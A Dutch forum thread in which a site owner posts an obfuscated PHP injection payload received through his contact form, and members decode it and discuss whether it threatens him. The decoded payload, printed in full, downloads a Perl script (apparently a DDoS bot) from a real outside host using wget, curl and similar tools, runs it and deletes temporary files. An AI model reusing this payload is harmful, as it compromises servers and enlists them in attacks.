malware hack poging
Ik zie dit via een contact formulier binnenkomen:
Zou dit zo kunnen werken ?
[.php] is toch niet geldig (als alternative < ? p h p )
( . punt door mij toegevoegd )
Code (php)
1
2
3
4
5
2
3
4
5
[php]XXXX(base64_decode('ZWNobyAic2V4Y3JpbWUiOw==
ZWNobyUyMCUyMnYwcENyM3clM0NiciUzRSUyMiUzQiUwQWVjaG8lMjAlMjJzeXMlM0ElMjIucGhwX3VuYW1lJTI4JTI5LiUyMiUzQ2JyJTNFJTIyJTNCJTBBJTI0Y21kJTNEJTIyZWNobyUyMG5vYjBkeUNyM3clM0JjZCUyMC90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi50eHQuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQmNkJTIwL3Zhci90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi5qcGcuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQiUyMiUzQiUwQSUyNGVzZWd1aWNtZCUzRGV4JTI4JTI0Y21kJTI5JTNCZWNobyUyMCUyNGVzZWd1aWNtZCUzQiUwQWZ1bmN0aW9uJTIwZXglMjglMjRjZmUlMjklN0IlMEElMjRyZXMlMjAlM0QlMjAlMjclMjclM0IlMEFpZiUyMCUyOCUyMWVtcHR5JTI4JTI0Y2ZlJTI5JTI5JTdCJTBBaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdleGVjJTI3JTI5JTI5JTdCJTBBQGV4ZWMlMjglMjRjZmUlMkMlMjRyZXMlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBqb2luJTI4JTIyJTVDbiUyMiUyQyUyNHJlcyUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3NoZWxsX2V4ZWMlMjclMjklMjklN0IlMEElMjRyZXMlMjAlM0QlMjBAc2hlbGxfZXhlYyUyOCUyNGNmZSUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3N5c3RlbSUyNyUyOSUyOSU3QiUwQUBvYl9zdGFydCUyOCUyOSUzQiUwQUBzeXN0ZW0lMjglMjRjZmUlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBAb2JfZ2V0X2NvbnRlbnRzJTI4JTI5JTNCJTBBQG9iX2VuZF9jbGVhbiUyOCUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3Bhc3N0aHJ1JTI3JTI5JTI5JTdCJTBBQG9iX3N0YXJ0JTI4JTI5JTNCJTBBQHBhc3N0aHJ1JTI4JTI0Y2ZlJTI5JTNCJTBBJTI0cmVzJTIwJTNEJTIwQG9iX2dldF9jb250ZW50cyUyOCUyOSUzQiUwQUBvYl9lbmRfY2xlYW4lMjglMjklM0IlMEElN0QlMEFlbHNlaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdwb3BlbiUyNyUyOSUyOSU3QiUwQSUyNGYlMjAlM0QlMjBAcG9wZW4lMjglMjRjZmUlMkMlMjJyJTIyJTI5JTNCJTBBd2hpbGUlMjglMjFAZmVvZiUyOCUyNGNmZSUyOSUyOSUyMCU3QiUyMCUyNHJlcyUyMC4lM0QlMjBAZnJlYWQlMjglMjRjZmUlMkMxMDI0JTI5JTNCJTIwJTdEJTBBQHBjbG9zZSUyOCUyNGYlMjklM0IlMEElN0QlN0QlMEFyZXR1cm4lMjAlMjRyZXMlM0IlMEElN0Q='));die();[/php]
ZWNobyUyMCUyMnYwcENyM3clM0NiciUzRSUyMiUzQiUwQWVjaG8lMjAlMjJzeXMlM0ElMjIucGhwX3VuYW1lJTI4JTI5LiUyMiUzQ2JyJTNFJTIyJTNCJTBBJTI0Y21kJTNEJTIyZWNobyUyMG5vYjBkeUNyM3clM0JjZCUyMC90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi50eHQuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQmNkJTIwL3Zhci90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi5qcGcuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQiUyMiUzQiUwQSUyNGVzZWd1aWNtZCUzRGV4JTI4JTI0Y21kJTI5JTNCZWNobyUyMCUyNGVzZWd1aWNtZCUzQiUwQWZ1bmN0aW9uJTIwZXglMjglMjRjZmUlMjklN0IlMEElMjRyZXMlMjAlM0QlMjAlMjclMjclM0IlMEFpZiUyMCUyOCUyMWVtcHR5JTI4JTI0Y2ZlJTI5JTI5JTdCJTBBaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdleGVjJTI3JTI5JTI5JTdCJTBBQGV4ZWMlMjglMjRjZmUlMkMlMjRyZXMlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBqb2luJTI4JTIyJTVDbiUyMiUyQyUyNHJlcyUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3NoZWxsX2V4ZWMlMjclMjklMjklN0IlMEElMjRyZXMlMjAlM0QlMjBAc2hlbGxfZXhlYyUyOCUyNGNmZSUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3N5c3RlbSUyNyUyOSUyOSU3QiUwQUBvYl9zdGFydCUyOCUyOSUzQiUwQUBzeXN0ZW0lMjglMjRjZmUlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBAb2JfZ2V0X2NvbnRlbnRzJTI4JTI5JTNCJTBBQG9iX2VuZF9jbGVhbiUyOCUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3Bhc3N0aHJ1JTI3JTI5JTI5JTdCJTBBQG9iX3N0YXJ0JTI4JTI5JTNCJTBBQHBhc3N0aHJ1JTI4JTI0Y2ZlJTI5JTNCJTBBJTI0cmVzJTIwJTNEJTIwQG9iX2dldF9jb250ZW50cyUyOCUyOSUzQiUwQUBvYl9lbmRfY2xlYW4lMjglMjklM0IlMEElN0QlMEFlbHNlaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdwb3BlbiUyNyUyOSUyOSU3QiUwQSUyNGYlMjAlM0QlMjBAcG9wZW4lMjglMjRjZmUlMkMlMjJyJTIyJTI5JTNCJTBBd2hpbGUlMjglMjFAZmVvZiUyOCUyNGNmZSUyOSUyOSUyMCU3QiUyMCUyNHJlcyUyMC4lM0QlMjBAZnJlYWQlMjglMjRjZmUlMkMxMDI0JTI5JTNCJTIwJTdEJTBBQHBjbG9zZSUyOCUyNGYlMjklM0IlMEElN0QlN0QlMEFyZXR1cm4lMjAlMjRyZXMlM0IlMEElN0Q='));die();[/php]
Gewijzigd op 08/06/2014 11:26:02 door - Roland -
Krijg je dit in een mail binnen?
"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
Code (php)
1
echo%20%22v0pCr3w%3Cbr%3E%22%3B%0Aecho%20%22sys%3A%22.php_uname%28%29.%22%3Cbr%3E%22%3B%0A%24cmd%3D%22echo%20nob0dyCr3w%3Bcd%20/tmp%3Brm%20-rf%20dor.*%20*.txt.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Bcd%20/var/tmp%3Brm%20-rf%20dor.*%20*.jpg.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3B%22%3B%0A%24eseguicmd%3Dex%28%24cmd%29%3Becho%20%24eseguicmd%3B%0Afunction%20ex%28%24cfe%29%7B%0A%24res%20%3D%20%27%27%3B%0Aif%20%28%21empty%28%24cfe%29%29%7B%0Aif%28function_exists%28%27exec%27%29%29%7B%0A@exec%28%24cfe%2C%24res%29%3B%0A%24res%20%3D%20join%28%22%5Cn%22%2C%24res%29%3B%0A%7D%0Aelseif%28function_exists%28%27shell_exec%27%29%29%7B%0A%24res%20%3D%20@shell_exec%28%24cfe%29%3B%0A%7D%0Aelseif%28function_exists%28%27system%27%29%29%7B%0A@ob_start%28%29%3B%0A@system%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27passthru%27%29%29%7B%0A@ob_start%28%29%3B%0A@passthru%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27popen%27%29%29%7B%0A%24f%20%3D%20@popen%28%24cfe%2C%22r%22%29%3B%0Awhile%28%21@feof%28%24cfe%29%29%20%7B%20%24res%20.%3D%20@fread%28%24cfe%2C1024%29%3B%20%7D%0A@pclose%28%24f%29%3B%0A%7D%7D%0Areturn%20%24res%3B%0A%7D
Dat is wat eruit komt. Lijkt inderdaad op een hack, het is in ieder geval een stuk script.
Edit: Ik heb er een link uit gevolgeld:
-Verwijderd-
Deze link leid naar een DDos-Script toe. Ik neem aan dat je je emails vanuit je server zelf, of door je host veilig verstuurt?
Gewijzigd op 08/06/2014 17:49:58 door Peter Flos
Misschien handig/verstandig om die link dan niet als hyperlink op te nemen, als het naar een ddos-script leidt....
Bij deze weggehaald, het ging mij er enkel om om te laten zien dat het dus een ddos poging is geweest.
- Roland - op 08/06/2014 14:22:43:
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.
"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
Dan is er niks aan de hand, lijkt me.
is er wel wat aan de hand lijkt mij?
of zit ik nu fout?
ik zie namelijk niet in hoe een script dit kan versturen zonder dat jij die functie
er in hebt gebouwt?
Een botje die denkt dat je een lek 3rd party script gebruikt?